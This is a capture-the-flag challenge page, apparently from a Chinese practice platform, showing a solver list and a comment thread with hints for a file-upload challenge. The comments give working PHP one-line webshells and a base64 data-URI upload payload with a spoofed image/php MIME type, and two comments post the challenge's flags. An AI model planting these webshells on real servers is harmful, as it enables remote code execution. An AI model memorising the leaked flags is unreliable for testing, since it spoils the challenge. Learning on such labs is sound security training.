评分(8)
解题动态
YameMres 攻破了该题 9小时前
chaojiikun 攻破了该题 23小时前
Biggie 攻破了该题 4天前
zttyzz 攻破了该题 5天前
15195388189 攻破了该题 6天前
她说我们只是朋友 攻破了该题 8天前
xstzdbcc 攻破了该题 9天前
19581700609 攻破了该题 11天前
guoadmin 攻破了该题 11天前
unilot 攻破了该题 11天前
17280870197 攻破了该题 13天前
ifnoif 攻破了该题 13天前
montarius 攻破了该题 13天前
17881152308 攻破了该题 14天前
陈尘 攻破了该题 15天前
kale 攻破了该题 16天前
szmlzw120 攻破了该题 17天前
nagatoyuki 攻破了该题 18天前
eggFr1edR1ce 攻破了该题 22天前
评论
Zhumeng 26天前
举报
注册账号登录用户会有个头像上传上传一个正常的头像发现被base64编码了,我们将一句话木马进行编码编码后上传将mime类型改成image/php
zhuohao 2月前
举报
蚁剑一直返回数据为空 一直连不上
hackhui 1月前
举报
一句话木马传参加''
LLTVLL 3月前
举报
一句话用这个 <?php eval($_POST['cmd']);?>,好像网上找的有的有问题
BlueL1ght 9月前
举报
<?php echo `$_POST[a]`;?>
Daniel2023 10月前
举报
<?php @eval($_POST['abc']);?> 上传data参数: data%3Aimage%2Fphp%3Bbase64%2C%2F9j%2FPD9waHAgQGV2YWwoJF9QT1NUWydhYmMnXSk7Pz4=
vchopin 1年前
举报
base64最后结尾要= 不然bp显示php syntax error,蚁剑连不上
XRain 1年前
举报
实战题才好玩,各种黑盒测试,我看到 data://image/jpeg 和保存的图片文件名后缀 jpeg,就猜想这两个 jpeg 是不是有关联,一测发现果然有。
不会编程的崽 1年前
举报
我不理解,POST['a'],死活连不上,POST['attack']就可以。。。。。
三碗不过杠 1年前
举报
flag{fd71260e4d41df49807229647056e7dd} 头像处文件上传,抓包base64编码写入一句话木马,上传蚁剑链接,重点就是改php,base
冯飞99 1年前
举报
这种实战题才是最爽的 flag{50352c0c4604ee60638e2579cbe3e141}